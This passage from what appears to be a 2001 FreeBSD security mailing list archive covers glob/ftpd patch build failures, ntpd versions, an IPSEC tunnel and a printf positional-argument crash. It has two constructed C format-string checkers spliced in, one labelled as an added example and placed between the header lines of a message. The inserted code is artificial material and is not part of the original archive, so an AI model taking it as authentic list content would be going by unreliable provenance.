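enum { FMT_OK = 0, FMT_MIXED = 1, FMT_GAP = 2, FMT_BAD = 3 };

/* Double the table and mark the new tail T_UNUSED.  The memset target is
 * *typetable + *tablesize, inside the table, as in the corrected patch line;
 * &typetable[*tablesize] would be an address taken from the pointer variable. */
static int grow_type_table(unsigned char **typetable, int *tablesize)
{
    int newsize = *tablesize * 2;
    unsigned char *p = realloc(*typetable, (size_t)newsize);
    if (p == NULL) return -1;
    *typetable = p;
    memset(*typetable + *tablesize, T_UNUSED, (size_t)(newsize - *tablesize));
    *tablesize = newsize;
    return 0;
}

/* Apply the quoted rules to fmt: numbered "%n$" conversions must not be mixed
 * with plain "%" ones (except "%%"), and using argument N requires arguments
 * 1..N-1 to be referenced too.  Returns FMT_OK, FMT_MIXED, FMT_GAP or FMT_BAD;
 * *maxarg (if non-NULL) gets the highest argument index used.  Length modifiers
 * are recorded as the conversion; '*' widths ("*m$" too) are not modelled. */
int check_positional_format(const char *fmt, int *maxarg)
{
    int size = STATIC_ARG_TBL_SIZE, numbered = 0, unnumbered = 0;
    int nextarg = 1, highest = 0, rc = FMT_OK;
    unsigned char *tbl = calloc((size_t)size, 1);
    const char *p = fmt;
    if (tbl == NULL) return FMT_BAD;
    while (*p != '\0' && rc == FMT_OK) {
        int argno = -1;
        if (*p++ != '%')
            continue;
        if (*p == '%') {                  /* "%%" is allowed in either form */
            p++;
            continue;
        }
        if (*p >= '1' && *p <= '9') {     /* "%n$", or else just a width */
            char *end;
            long n = strtol(p, &end, 10);
            if (*end == '$') {
                numbered = 1;
                argno = (int)n;
                p = end + 1;
            }
        }
        while (*p != '\0' && !isalpha((unsigned char)*p))
            p++;                          /* skip flags, width, precision */
        if (*p == '\0') {                 /* no conversion character at all */
            rc = FMT_BAD;
            break;
        }
        if (argno < 0) {
            unnumbered = 1;
            argno = nextarg++;
        }
        while (argno >= size && rc == FMT_OK)   /* same growth step as libc */
            if (grow_type_table(&tbl, &size) < 0)
                rc = FMT_BAD;
        if (rc != FMT_OK)
            break;
        tbl[argno] = (unsigned char)*p;
        if (argno > highest)
            highest = argno;
        p++;
    }
    if (rc == FMT_OK && numbered && unnumbered)
        rc = FMT_MIXED;
    else if (rc == FMT_OK && numbered)
        for (int i = 1; i <= highest && rc == FMT_OK; i++)
            if (tbl[i] == T_UNUSED)
                rc = FMT_GAP;
    if (maxarg != NULL)
        *maxarg = highest;
    free(tbl);
    return rc;
}

/* Highest argument index fmt consumes, or -1 if it is malformed. */
int format_max_arg(const char *fmt)
{
    int m = 0;
    return check_positional_format(fmt, &m) == FMT_BAD ? -1 : m;
}

int main(void)
{   /* the two formats from the thread: a gap below %7$, and mixed forms */
    printf("gap=%d mixed=%d\n", check_positional_format("%7$x\n", NULL),
           check_positional_format("%d%d%d%d%d%d%d %7$x\n", NULL));
    return 0;
}
```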
From: Scott Johnson
To: freebsd-security@freebsd.org
Subject: IPSEC tunnel
Message-ID: <20010419164748.A93102@ns2.airlinksys.com>

I have an IPSEC tunnel running between two freebsd gateways. The tunnel
itself is a UDP tunnel created by vtun, so that I can traverse a NAT
between the gateways which doesn't understand ip tunnels. I have SPD
entries on both gateways directing traffic from one net to the other to
be tunneled through tun0, and the SAD entries are handled by racoon
(listening on the tunnel interfaces) using X.509 certificates.

It works fine except for the fact that neither of the nets can reach the
opposite gateway. The gateway will reach the opposite net, for example
with an ICMP ping or a TCP syn, but the reply, though sent by the host,
and forwarded by the first gateway through the tunnel, where you can see
it received by the tunnel interface in IPSEC encapsulated form, is never
received by the application. It seems to me this SHOULD be working. How
would I debug this?

-- 
Scott Johnson
System/Network Administrator
Airlink Systems

From owner-freebsd-security Thu Apr 19 15:04:10 2001
Date: Thu, 19 Apr 2001 15:04:07 -0700 (PDT)
From: Jeff Wyman
To: freebsd-security@freebsd.org
Subject: RE: Yet another Glob-related problem

Strange.. I opened up glob.h, went to the GLOB_BRACE line, and I found a
little backslash above it on a line by itself. I have no idea how it got
there, but my best explanation is too many beers and a bad keystroke when
I placed the file there in the first place. Thanks to vi, I noticed the
slash and killed it. Build worked fine.

Sorry for wasting anyone's time!

Thanks

From owner-freebsd-security Thu Apr 19 15:18:52 2001
Message-ID: <3ADF654F.D5897981@homepage.ru>
Date: Fri, 20 Apr 2001 02:23:11 +0400
From: "D. K."
To: Garrett Wollman, security@FreeBSD.ORG
Subject: Re: FreeBSD grow bug
References: <3ADF4DD0.17AB0F64@homepage.ru> <200104192042.QAA40625@khavrinen.lcs.mit.edu> <3ADF5442.BD703D6@homepage.ru> <200104192113.RAA40978@khavrinen.lcs.mit.edu>

Garrett Wollman wrote:
> 
> < said:
> 
> > You are not right
> 
> To quote from the Austin Group draft 6:
> 
>     The format can contain either numbered argument conversion
>     specifications (that is, "%n$" and "*m$"), or unnumbered
>     argument conversion specifications (that is, % and *), but not
>                                                            ^^^^^^^
>     both. The only exception to this is that %% can be mixed with
>     ^^^^^
>     the "%n$" form. The results of mixing numbered and unnumbered
>     argument specifications in a format string are undefined. When
>     numbered argument specifications are used, specifying the Nth
>                                                ^^^^^^^^^^^^^^^^^^
>     argument requires that all the leading arguments, from the
>     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>     first to the (N-1)th, are specified in the format string.
>     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> 
> The exact same language, spread out over several paragraphs, appears
> in the Single UNIX Spec version 2.
> 
> -GAWollman

In any case the result should not generate core dump on FreeBSD in my examples.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

The error is present on FreeBSD 4.2-RELEASE
See answer from Robert Simmons

About first example:
I can call func(char *fmt, ...) with many parameters, and to use not all
from them. Such as:

    printf("%d\n", 1, 2, 3, 4, 5, 6, 7);

The compiler cares of restoration of a stack. In my examples no
unaccessed elements.
About second example:
I have mixed them accurately. The compiler knows to what unit to access.

In any case on _FreeBSD_ these examples must work..

Best Regards,
Dmitry Kopteloff
---
LG Soft Lab.
Information Security Group, RUSSIA

From owner-freebsd-security Thu Apr 19 15:36:24 2001
Date: Thu, 19 Apr 2001 17:33:51 -0500
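The disagreement in the two messages above turns on what a printf-style format is allowed to consume: the Austin Group text quoted by Garrett Wollman permits either numbered ("%n$", "*m$") or unnumbered ("%", "*") conversions, never both ("%%" excepted), and requires that numbered positions have no gaps. The checker below is an added example written for this archive; it is not code from the thread or from FreeBSD's libc. It applies exactly those two rules to a format string before it reaches printf(), so a program that takes formats from a configuration file or a message catalog can refuse an undefined-behaviour format instead of finding out at run time. The names fmt_check, take_arg, the FMT_* status codes and the FMT_MAX_ARGS limit are this example's own, and the sample formats in main() are constructed.

```c
/*
 * Added example (not from the thread or FreeBSD's libc): check a
 * printf-style format against the Austin Group / SUSv2 rule quoted
 * above.  Numbered ("%n$", "*m$") and unnumbered ("%", "*")
 * conversions may not be mixed ("%%" excepted), and with numbered
 * conversions every position from 1 to the highest one must be used.
 * Names (fmt_check, take_arg, FMT_*) and the limit are this example's own.
 */
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

enum fmt_status {
    FMT_OK = 0,
    FMT_MIXED,      /* numbered and unnumbered conversions in one format */
    FMT_GAP,        /* numbered, but a position below the maximum is unused */
    FMT_BAD_SYNTAX  /* unterminated or unknown conversion, or bad "n$" */
};

#define FMT_MAX_ARGS 64     /* constructed limit for this example */

struct scan {
    unsigned char used[FMT_MAX_ARGS + 1];
    int max_pos, numbered, unnumbered;
};

/* Consume one argument reference at *p.  An "n$" prefix marks a numbered
 * position and *p is advanced past the '$'; plain digits are a field width
 * and are left for the caller.  Returns -1 when n is out of range. */
static int take_arg(const char **p, struct scan *s)
{
    char *end;
    long n;

    if (isdigit((unsigned char)**p)) {
        n = strtol(*p, &end, 10);
        if (*end == '$') {
            if (n < 1 || n > FMT_MAX_ARGS)
                return -1;
            *p = end + 1;
            s->numbered = 1;
            s->used[n] = 1;
            if (n > s->max_pos)
                s->max_pos = (int)n;
            return 0;
        }
    }
    s->unnumbered = 1;          /* no "n$": an unnumbered argument */
    return 0;
}

enum fmt_status fmt_check(const char *fmt)
{
    struct scan s;
    const char *p = fmt;
    int i;

    memset(&s, 0, sizeof s);
    while (*p) {
        if (*p++ != '%')
            continue;
        if (*p == '%') { p++; continue; }        /* "%%" may be mixed freely */
        if (take_arg(&p, &s) < 0)
            return FMT_BAD_SYNTAX;
        while (*p && strchr("-+ #0", *p))       /* flags */
            p++;
        for (i = 0; i < 2; i++) {               /* width, then ".precision" */
            if (i == 1) {
                if (*p != '.')
                    break;
                p++;
            }
            if (*p == '*') {                    /* "*" or "*m$": another argument */
                p++;
                if (take_arg(&p, &s) < 0)
                    return FMT_BAD_SYNTAX;
            } else {
                while (isdigit((unsigned char)*p))
                    p++;
            }
        }
        while (*p && strchr("hlLqjzt", *p))     /* length modifiers */
            p++;
        if (*p == '\0' || !strchr("diouxXeEfFgGaAcspn", *p))
            return FMT_BAD_SYNTAX;
        p++;
    }
    if (s.numbered && s.unnumbered)
        return FMT_MIXED;
    for (i = 1; i <= s.max_pos; i++)
        if (!s.used[i])
            return FMT_GAP;
    return FMT_OK;
}

int main(void)
{
    /* Constructed sample formats; the last two break the quoted rule. */
    static const char *samples[] = {
        "%d %s", "%2$s %1$d", "%% %1$d", "%2$*1$d", "%1$d %s", "%3$d %1$d"
    };
    static const char *names[] = {
        "ok", "mixed numbered/unnumbered", "gap in numbered positions", "bad syntax"
    };
    size_t i;

    for (i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-12s -> %s\n", samples[i], names[fmt_check(samples[i])]);
    return 0;
}
```

The checker deliberately says nothing about how many arguments the caller actually passed: the excess-argument case in the printf("%d\n", 1, 2, 3, 4, 5, 6, 7) example is a separate question from whether the format itself is well formed, and a format that mixes "%1$d" with "%s" or skips "%2$" is undefined no matter how the arguments are supplied.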
From: Will Andrews
To: Emre Bastuz
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Tripwire or the like for FreeBSD ?
Message-ID: <20010419173351.D5017@casimir.physics.purdue.edu>
References: <3ADF3CCC.FB8498DC@emre.de>
In-Reply-To: <3ADF3CCC.FB8498DC@emre.de>; from info@emre.de on Thu, Apr 19, 2001 at 09:30:20PM +0200

On Thu, Apr 19, 2001 at 09:30:20PM +0200, Emre Bastuz wrote:
> I found something called "Aide" in the ports directory, but to be honest -
> I don't trust a "Version 0.7" when it comes to security.

I don't trust system administrators who judge by version numbers. You
do realize these numbers are *COMPLETELY* arbitrary, right?
-- 
wca

From owner-freebsd-security Thu Apr 19 16:32:12 2001
From: "Philip J. Koenig"
Organization: The Electric Kahuna Organization
To: FreeBSD Security List
Date: Thu, 19 Apr 2001 16:32:08 -0700
Subject: ntpd version not updated?
Message-ID: <3ADF1308.3067.BD4A84@localhost>

Re: the recent security advisory on ntpd. It says in part that versions
of ntpd prior to "ntp-4.0.99k_2" are vulnerable, and that 4.2 STABLE as
of 4/6 was corrected.

I just CVSup'd 4.2-STABLE (RELENG_4) as of 4/15, did make world etc., and
based on the "version" command in ntpq and ntpdc, and the syslog message,
I'm still running version 4.0.99b. Here's the syslog message:

Apr 19 16:14:56 server ntpd[168]: ntpd 4.0.99b Sun Apr 15 09:10:45 PDT 2001 (1)

Is there something I'm missing here?

-- 
Philip J. Koenig
pjklist@ekahuna.com
Electric Kahuna Systems -- Computers & Communications for the New Millennium

From owner-freebsd-security Thu Apr 19 16:58:22 2001
Date: Thu, 19 Apr 2001 19:58:13 -0400
From: Chris Faulhaber
To: "Philip J. Koenig"
Cc: FreeBSD Security List
Subject: Re: ntpd version not updated?
Message-ID: <20010419195813.A79537@peitho.fxp.org>
References: <3ADF1308.3067.BD4A84@localhost>
In-Reply-To: <3ADF1308.3067.BD4A84@localhost>; from pjklist@ekahuna.com on Thu, Apr 19, 2001 at 04:32:08PM -0700

On Thu, Apr 19, 2001 at 04:32:08PM -0700, Philip J. Koenig wrote:
> Re: the recent security advisory on ntpd. It says in part that versions of ntpd
> prior to "ntp-4.0.99k_2" are vulnerable, and that 4.2 STABLE as of 4/6 was
> corrected.
> 
> I just CVSup'd 4.2-STABLE (RELENG_4) as of 4/15, did make world etc., and
> based on the "version" command in ntpq and ntpdc, and the syslog message,
> I'm still running version 4.0.99b. Here's the syslog message:
> 
> Apr 19 16:14:56 server ntpd[168]: ntpd 4.0.99b Sun Apr 15 09:10:45 PDT 2001 (1)
> 
> 
> Is there something I'm missing here?
> 

If you are using ntpd in the base system and you updated your system
after 4/6, you are not vulnerable.

If you are using ntpd from the ports system, ensure that its
version is ntp-4.0.99k_2 or greater. The following command should
display the version of the port you have installed:

    # pkg_version | grep ntp

-- 
Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org
--------------------------------------------------------
FreeBSD: The Power To Serve - http://www.FreeBSD.org

From owner-freebsd-security Thu Apr 19 16:58:37 2001
Message-ID: <3ADF7BDD.A7868DA@packeteer.com>
Date: Thu, 19 Apr 2001 16:59:25 -0700
From: Brian Tiemann
Organization: Packeteer, Inc.
To: Rob Simmons
Cc: Ben Vaughn, Chris Faulhaber, security@FreeBSD.ORG
Subject: Re: Another glob problem
References: <20010419164947.M72854-100000@mail.wlcg.com>

Yes, I just finished doing that... same problem.

I hope that someone on the developer side who HAS successfully built
the new libc on -STABLE sources could do the same (delete everything and
start from scratch) so we can find out what this problem is. Thanks...

Brian

Rob Simmons wrote:
> 
> Have you tried moving your kernel config file, and any other files that
> you need from /usr/src to /root, then delete the whole /usr/src, /usr/obj,
> and /usr/sup/src-all directories before running cvsup?
> 
> When you are done, just move your kernel config file back where it
> belongs, and try again.
> 
> Robert Simmons
> Systems Administrator
> http://www.wlcg.com/
> 
> On Thu, 19 Apr 2001, Ben Vaughn wrote:
> 
> > I am also experiencing this problem building from a 10-minute
> > old stable-cvsup.
> >
> > -biv
> >
> > -----Original Message-----
> > From: Brian Tiemann [mailto:briant@packeteer.com]
> > Sent: Thursday, April 19, 2001 16:41
> > To: Chris Faulhaber
> > Cc: security@freebsd.org
> > Subject: Re: Another glob problem
> >
> >
> > Yes, that's what I thought. It's RELENG_4, and I didn't apply the
> > patch.
> >
> > I also tried multiple make cleans, and also deleting
> > /usr/src/lib/libc/db/mpool and rebuilding. Same problem.
> >
> > I've disabled my ftpd for now, until we can figure this out. This must
> > be a particularly amorphous code region across different systems.
> >
> > Brian
> >
> >
> > Chris Faulhaber wrote:
> > >
> > > On Thu, Apr 19, 2001 at 01:24:05PM -0700, Brian Tiemann wrote:
> > > > > I'm running 4.2-RELEASE, with the March 22 glob.h installed in /usr/src
> > > > > and a fresh make world as of about ten minutes ago.
> > > >
> > > > Argh... let me rephrase that.
> > > >
> > > > I'm running 4.2-RELEASE, with the March 22 glob.h installed in
> > > > /usr/include (it's the glob.h that defines GLOB_MAXPATH, so it seems to
> > > > be the right one) and a fresh cvsup as of about ten minutes ago.
> > > >
> > > > Yeesh..
> > > >
> > >
> > > A fresh cvsup of RELENG_4 or RELENG_4_2_0_RELEASE? If it is the former,
> > > the patch is not required.
> > >
> > > --
> > > Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org
> > > --------------------------------------------------------
> > > FreeBSD: The Power To Serve - http://www.FreeBSD.org

From owner-freebsd-security Thu Apr 19 17:10:08 2001
Message-Id: <200104200008.f3K08sA07253@cwsys.cwsent.com>
From: Cy Schubert - ITSD Open Systems Group
To: Chris Faulhaber
Cc: "Philip J. Koenig", FreeBSD Security List
Subject: Re: ntpd version not updated?
In-reply-to: Your message of "Thu, 19 Apr 2001 19:58:13 EDT." <20010419195813.A79537@peitho.fxp.org>
Date: Thu, 19 Apr 2001 17:08:50 -0700

In message <20010419195813.A79537@peitho.fxp.org>, Chris Faulhaber writes:
> 
> On Thu, Apr 19, 2001 at 04:32:08PM -0700, Philip J. Koenig wrote:
> > Re: the recent security advisory on ntpd. It says in part that versions of ntpd
> > prior to "ntp-4.0.99k_2" are vulnerable, and that 4.2 STABLE as of 4/6 was
> > corrected.
> > 
> > I just CVSup'd 4.2-STABLE (RELENG_4) as of 4/15, did make world etc., and
> > based on the "version" command in ntpq and ntpdc, and the syslog message,
> > I'm still running version 4.0.99b. Here's the syslog message:
> > 
> > Apr 19 16:14:56 server ntpd[168]: ntpd 4.0.99b Sun Apr 15 09:10:45 PDT 2001 (1)
> > 
> > 
> > Is there something I'm missing here?
> > 
> 
> If you are using ntpd in the base system and you updated your system
> after 4/6, you are not vulnerable.
> 
> If you are using ntpd from the ports system, ensure that it's
> version is ntp-4.0.99k_2 or greater. The following command should
> display the version of the port you have installed:
> # pkg_version | grep ntp

ntp-4.0.99k23 is the most recent version of ntp. It includes the fix
for the recently discovered exploit.
-- 
Regards,                        Phone:  (250)387-8437
Cy Schubert                     Fax:    (250)387-5766
Team Leader, Sun/Alpha Team     Internet:  Cy.Schubert@osg.gov.bc.ca
Open Systems Group, ITSD, ISTA
Province of BC

From owner-freebsd-security Thu Apr 19 18:00:09 2001
Date: Thu, 19 Apr 2001 18:00:05 -0700
From: Kris Kennaway
To: "Philip J. Koenig"
Cc: FreeBSD Security List
Subject: Re: ntpd version not updated?
Message-ID: <20010419180005.B54774@xor.obsecurity.org>
References: <3ADF1308.3067.BD4A84@localhost>
In-Reply-To: <3ADF1308.3067.BD4A84@localhost>; from pjklist@ekahuna.com on Thu, Apr 19, 2001 at 04:32:08PM -0700

On Thu, Apr 19, 2001 at 04:32:08PM -0700, Philip J. Koenig wrote:
> Re: the recent security advisory on ntpd. It says in part that versions of ntpd
> prior to "ntp-4.0.99k_2" are vulnerable, and that 4.2 STABLE as of 4/6 was
> corrected.
> 
> I just CVSup'd 4.2-STABLE (RELENG_4) as of 4/15, did make world etc., and
> based on the "version" command in ntpq and ntpdc, and the syslog message,
> I'm still running version 4.0.99b. Here's the syslog message:
> 
> Apr 19 16:14:56 server ntpd[168]: ntpd 4.0.99b Sun Apr 15 09:10:45 PDT 2001 (1)
> 
> 
> Is there something I'm missing here?

Yes, 4.0.99k_2 is the version of the FreeBSD port of ntpd 4.0.99k,
which isn't the same as the version string reported by the ntpd in the
base system (4.0.99b), or even the version string reported by the ntpd
in ports (which is still 4.099k).

Port version numbers != vendor software version numbers
Port version of ntpd != base system version of ntpd

Kris

From owner-freebsd-security Thu Apr 19 18:01:22 2001
Date: Thu, 19 Apr 2001 18:01:18 -0700
From: Kris Kennaway
To: Brian Tiemann
Cc: Rob Simmons, Ben Vaughn, Chris Faulhaber, security@FreeBSD.ORG
Subject: Re: Another glob problem
Message-ID: <20010419180118.C54774@xor.obsecurity.org>
References: <20010419164947.M72854-100000@mail.wlcg.com> <3ADF7BDD.A7868DA@packeteer.com>
In-Reply-To: <3ADF7BDD.A7868DA@packeteer.com>; from briant@packeteer.com on Thu, Apr 19, 2001 at 04:59:25PM -0700

On Thu, Apr 19, 2001 at 04:59:25PM -0700, Brian Tiemann wrote:
> Yes, I just finished doing that... same problem.
> 
> I hope that someone on the developer side who HAS successfully built
> the new libc on -STABLE sources could do the same (delete everything and
> start from scratch) so we can find out what this problem is. Thanks...

I tested the patch + instructions on a clean checkout of 4.2-RELEASE
prior to sending out the advisory.

Kris

From owner-freebsd-security Thu Apr 19 18:09:24 2001
Message-ID: <3ADF8C73.7E987982@packeteer.com>
Date: Thu, 19 Apr 2001 18:10:11 -0700
From: Brian Tiemann
Organization: Packeteer, Inc.
To: Kris Kennaway
Cc: Rob Simmons, Ben Vaughn, Chris Faulhaber, security@FreeBSD.ORG
Subject: Re: Another glob problem
References: <20010419164947.M72854-100000@mail.wlcg.com> <3ADF7BDD.A7868DA@packeteer.com> <20010419180118.C54774@xor.obsecurity.org>

Well, that's great, but something needs to be looked at for those of us
tracking 4-STABLE. Thanks...

Brian

Kris Kennaway wrote:
> 
> On Thu, Apr 19, 2001 at 04:59:25PM -0700, Brian Tiemann wrote:
> > Yes, I just finished doing that... same problem.
> >
> > I hope that someone on the developer side who HAS successfully built
> > the new libc on -STABLE sources could do the same (delete everything and
> > start from scratch) so we can find out what this problem is. Thanks...
> 
> I tested the patch + instructions on a clean checkout of 4.2-RELEASE
> prior to sending out the advisory.
> 
> Kris

From owner-freebsd-security Thu Apr 19 18:12:54 2001
From: "Otter"
To: ,
Subject: remote SecureID authentication anyone?
Date: Thu, 19 Apr 2001 21:12:41 -0400
Message-ID: <000201c0c936$ffec3120$1400a8c0@zoso>

I'm looking to set up a machine in our office so a few of us can get in
on a VPN for network access after hours from home. I've heard VPNs are
possible. After discussing this with office management, they say the only
way we can do this is to use security in addition to passwords. When I
asked if our SecureID cards/keychains would work, they agreed on it.

Now... has anyone got this setup or something similar? I looked on the
mailing list archives with no luck... searched some web pages... I even
remember ssh2 using it, but now I don't see any reference to it in the
openssh or ssh2 makefiles. Answers and/or suggestions are greatly
appreciated.

-Otter

p.s. if you're reading this from -security, please Cc: me, as I'm not
subscribed to that list.

From owner-freebsd-security Thu Apr 19 18:15:03 2001
Date: Thu, 19 Apr 2001 18:14:59 -0700
From: Kris Kennaway
To: Brian Tiemann
Cc: Kris Kennaway, Rob Simmons, Ben Vaughn, Chris Faulhaber, security@FreeBSD.ORG
Subject: Re: Another glob problem
Message-ID: <20010419181459.B57373@xor.obsecurity.org>
References: <20010419164947.M72854-100000@mail.wlcg.com> <3ADF7BDD.A7868DA@packeteer.com> <20010419180118.C54774@xor.obsecurity.org> <3ADF8C73.7E987982@packeteer.com>
In-Reply-To: <3ADF8C73.7E987982@packeteer.com>; from briant@packeteer.com on Thu, Apr 19, 2001 at 06:10:11PM -0700

On Thu, Apr 19, 2001 at 06:10:11PM -0700, Brian Tiemann wrote:
> Well, that's great, but something needs to be looked at for those of us
> tracking 4-STABLE. Thanks...

If you're tracking -stable, why not just cvsup? We can't possibly
test the patches with every possible different point on the RELENG_4
continuum, so we kind of assume that if you've cvsupped once to get to
a non-release version of -stable you can do it again. Having said
that, I can't think of any differences in libc which would have caused
this to fail between 4.2-REL and some later version of 4.2-STABLE.

Kris

From owner-freebsd-security Thu Apr 19 18:20:13 2001
Message-ID: <3ADF8EFB.1B6EBA04@packeteer.com>
Date: Thu, 19 Apr 2001 18:20:59 -0700
From: Brian Tiemann
Organization: Packeteer, Inc.
To: Kris Kennaway
Cc: Rob Simmons, Ben Vaughn, Chris Faulhaber, security@FreeBSD.ORG
Subject: Re: Another glob problem
References: <20010419164947.M72854-100000@mail.wlcg.com> <3ADF7BDD.A7868DA@packeteer.com> <20010419180118.C54774@xor.obsecurity.org> <3ADF8C73.7E987982@packeteer.com> <20010419181459.B57373@xor.obsecurity.org>

Yes, I cvsupped immediately before rebuilding. That's the entire
problem.

The current best attempt has been to remove /usr/src and /usr/obj,
cvsup to checkout a fresh 4-STABLE tree as of this afternoon, and try to
build libc. But that's not working. So while what's causing libc to not
compile is probably not related to the patch, what it means is that
we're all effectively left without a solution to the ftpd overflow
problem until the build error in mpool.c is dealt with.

I cvsup 4-STABLE every night. I sort of thought that was what "tracking
-STABLE" meant. It's so I don't have to worry about downloading patches.

Brian

Kris Kennaway wrote:
> 
> On Thu, Apr 19, 2001 at 06:10:11PM -0700, Brian Tiemann wrote:
> > Well, that's great, but something needs to be looked at for those of us
> > tracking 4-STABLE. Thanks...
> 
> If you're tracking -stable, why not just cvsup? We can't possibly
> test the patches with every possible different point on the RELENG_4
> continuum, so we kind of assume that if you've cvsupped once to get to
> a non-release version of -stable you can do it again. Having said
> that, I can't think of any differences in libc which would have caused
> this to fail between 4.2-REL and some later version of 4.2-STABLE.
> 
> Kris

From owner-freebsd-security Thu Apr 19 18:31:29 2001
Date: Thu, 19 Apr 2001 18:31:25 -0700
From: Kris Kennaway
To: Brian Tiemann
Cc: Kris Kennaway , Rob Simmons , Ben Vaughn , Chris Faulhaber , security@FreeBSD.ORG
Subject: Re: Another glob problem
Message-ID: <20010419183125.A57696@xor.obsecurity.org>
References: <20010419164947.M72854-100000@mail.wlcg.com> <3ADF7BDD.A7868DA@packeteer.com> <20010419180118.C54774@xor.obsecurity.org> <3ADF8C73.7E987982@packeteer.com> <20010419181459.B57373@xor.obsecurity.org> <3ADF8EFB.1B6EBA04@packeteer.com>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="dDRMvlgZJXvWKvBx"
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <3ADF8EFB.1B6EBA04@packeteer.com>; from briant@packeteer.com on Thu, Apr 19, 2001 at 06:20:59PM -0700
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

--dDRMvlgZJXvWKvBx
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

On Thu, Apr 19, 2001 at 06:20:59PM -0700, Brian Tiemann wrote:
> Yes, I cvsupped immediately before rebuilding. That's the entire
> problem.
>
> The current best attempt has been to remove /usr/src and /usr/obj,
> cvsup to checkout a fresh 4-STABLE tree as of this afternoon, and try to
> build libc. But that's not working. So while what's causing libc to not
> compile is probably not related to the patch, what it means is that
> we're all effectively left without a solution to the ftpd overflow
> problem until the build error in mpool.c is dealt with.

There is no build error in libc in RELENG_4 (my installworld is
installworlding as I type).

Are you making world, or trying to compile by hand? If you do a
complete cvsup you can't use the instructions in the advisory because
they assume that the only things which have changed are those in the
patch; if you cvsup, then a lot of other stuff may change which
requires nontrivial hoop-jumping, which is taken care of by make world
and the usual upgrade procedure.

Kris

--dDRMvlgZJXvWKvBx
Content-Type: application/pgp-signature
Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org

iD8DBQE635FtWry0BWjoQKURAsD0AKCAhvH924HAMB87bZufZtNmH+QRMgCg121w
LYrfxlEEtPJQea9xlAbRA24=
=LqlQ
-----END PGP SIGNATURE-----

--dDRMvlgZJXvWKvBx--

From owner-freebsd-security Thu Apr 19 18:36:43 2001
Delivered-To: freebsd-security@freebsd.org
Received: from uadvg134.cms.usa.net (uadvg134.cms.usa.net [165.212.11.134]) by hub.freebsd.org (Postfix) with SMTP id 5F6F537B422 for ; Thu, 19 Apr 2001 18:36:40 -0700 (PDT) (envelope-from briant@packeteer.com)
Received: (qmail 18393 invoked from network); 20 Apr 2001 01:36:39 -0000
Received: from uadvg129.cms.usa.net (165.212.11.129) by corprelay.cms.usa.net with SMTP; 20 Apr 2001 01:36:39 -0000
Received: (qmail 7033 invoked by uid 0); 20 Apr 2001 01:36:39 -0000
Received: USA.NET MXFirewall, messaging filters applied; Fri, 20 Apr 2001 01:36:38 GMT
Received: from packeteer.com [207.78.98.2] by uadvg129 (ASMTP/briant@postoffice.packeteer.com) via mtad (53CM.0401.1.03) with ESMTP id 561FDTBKK0390M20; Fri, 20 Apr 2001 01:36:37 GMT
Message-ID: <3ADF92DC.2B5A941D@packeteer.com>
Date: Thu, 19 Apr 2001 18:37:32 -0700
From: Brian Tiemann
Organization: Packeteer, Inc.
X-Mailer: Mozilla 4.74 [en] (Win98; U)
X-Accept-Language: en
MIME-Version: 1.0
To: Kris Kennaway
Cc: Rob Simmons , Ben Vaughn , Chris Faulhaber , security@FreeBSD.ORG
Subject: Re: Another glob problem
References: <20010419164947.M72854-100000@mail.wlcg.com> <3ADF7BDD.A7868DA@packeteer.com> <20010419180118.C54774@xor.obsecurity.org> <3ADF8C73.7E987982@packeteer.com> <20010419181459.B57373@xor.obsecurity.org> <3ADF8EFB.1B6EBA04@packeteer.com> <20010419183125.A57696@xor.obsecurity.org>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

I'm just trying to compile /usr/src/lib/libc. I suppose that's not
going to work-- a make world will be indicated. Which really sucks for a
production server.

Yikes. And we were so close to making it to 4.3-RELEASE without an
interim build...

Brian

Kris Kennaway wrote:
>
> On Thu, Apr 19, 2001 at 06:20:59PM -0700, Brian Tiemann wrote:
> > Yes, I cvsupped immediately before rebuilding. That's the entire
> > problem.
> >
> > The current best attempt has been to remove /usr/src and /usr/obj,
> > cvsup to checkout a fresh 4-STABLE tree as of this afternoon, and try to
> > build libc. But that's not working. So while what's causing libc to not
> > compile is probably not related to the patch, what it means is that
> > we're all effectively left without a solution to the ftpd overflow
> > problem until the build error in mpool.c is dealt with.
>
> There is no build error in libc in RELENG_4 (my installworld is
> installworlding as I type).
>
> Are you making world, or trying to compile by hand? If you do a
> complete cvsup you can't use the instructions in the advisory because
> they assume that the only things which have changed are those in the
> patch; if you cvsup, then a lot of other stuff may change which
> requires nontrivial hoop-jumping, which is taken care of by make world
> and the usual upgrade procedure.
>
> Kris
>
> ------------------------------------------------------------------------
> Part 1.2Type: application/pgp-signature

From owner-freebsd-security Thu Apr 19 18:41:04 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mail.wlcg.com (mail.wlcg.com [207.226.17.4]) by hub.freebsd.org (Postfix) with ESMTP id 53D5D37B422 for ; Thu, 19 Apr 2001 18:41:00 -0700 (PDT) (envelope-from rsimmons@wlcg.com)
Received: from localhost (rsimmons@localhost) by mail.wlcg.com (8.11.3/8.11.3) with ESMTP id f3K1fQa84146; Thu, 19 Apr 2001 21:41:26 -0400 (EDT) (envelope-from rsimmons@wlcg.com)
Date: Thu, 19 Apr 2001 21:41:22 -0400 (EDT)
From: Rob Simmons
To: Brian Tiemann
Cc: Kris Kennaway , Ben Vaughn , Chris Faulhaber ,
Subject: Re: Another glob problem
In-Reply-To: <3ADF8EFB.1B6EBA04@packeteer.com>
